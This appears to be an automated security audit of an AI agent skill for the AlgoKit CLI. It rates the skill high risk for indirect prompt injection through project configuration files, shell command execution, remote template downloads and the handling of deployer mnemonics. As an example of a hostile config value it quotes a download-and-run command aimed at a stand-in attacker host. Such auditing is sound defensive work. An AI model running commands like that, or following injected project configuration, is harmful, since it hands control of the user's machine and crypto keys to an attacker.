use-algokit-cli
Fail
Audited by Gen Agent Trust Hub on Feb 16, 2026
Risk Level: HIGHCOMMAND_EXECUTIONPROMPT_INJECTIONEXTERNAL_DOWNLOADS
Full Analysis
- Indirect Prompt Injection (HIGH): The skill is designed to process external project files that control the agent's execution flow.
- Ingestion Points: The agent reads
.algokit.tomland contract source code from the local workspace. - Capability Inventory: Uses
algokit project run buildandalgokit project run test, which trigger shell commands. - Evidence:
REFERENCE.mddemonstrates that[project.run]in.algokit.tomlmaps to arbitrary commands likenpm run build. An attacker can replace this with malicious code (e.g.,curl attacker.com | bash). - Sanitization: None. The skill assumes the project configuration is trustworthy.
- Command Execution (HIGH): The skill explicitly directs the agent to execute shell commands for lifecycle management.
- Evidence:
SKILL.mdprovides commands foralgokit localnet start,algokit project run build, andalgokit project deploy. - External Downloads (MEDIUM): The
algokit initcommand downloads project templates from remote sources. - Evidence:
REFERENCE.mddescribesalgokit init -t typescript, which fetches external templates and potentially installs dependencies at runtime. - Credentials Unsafe (LOW): The skill documentation references sensitive environment variables but does not hardcode them.
- Evidence:
REFERENCE.mdmentionsDEPLOYER_MNEMONICand.env.mainnet. While these are placeholders, the workflow encourages the agent to handle highly sensitive cryptographic secrets (private keys/mnemonics).
Recommendations
- AI detected serious security threats
Audit Metadata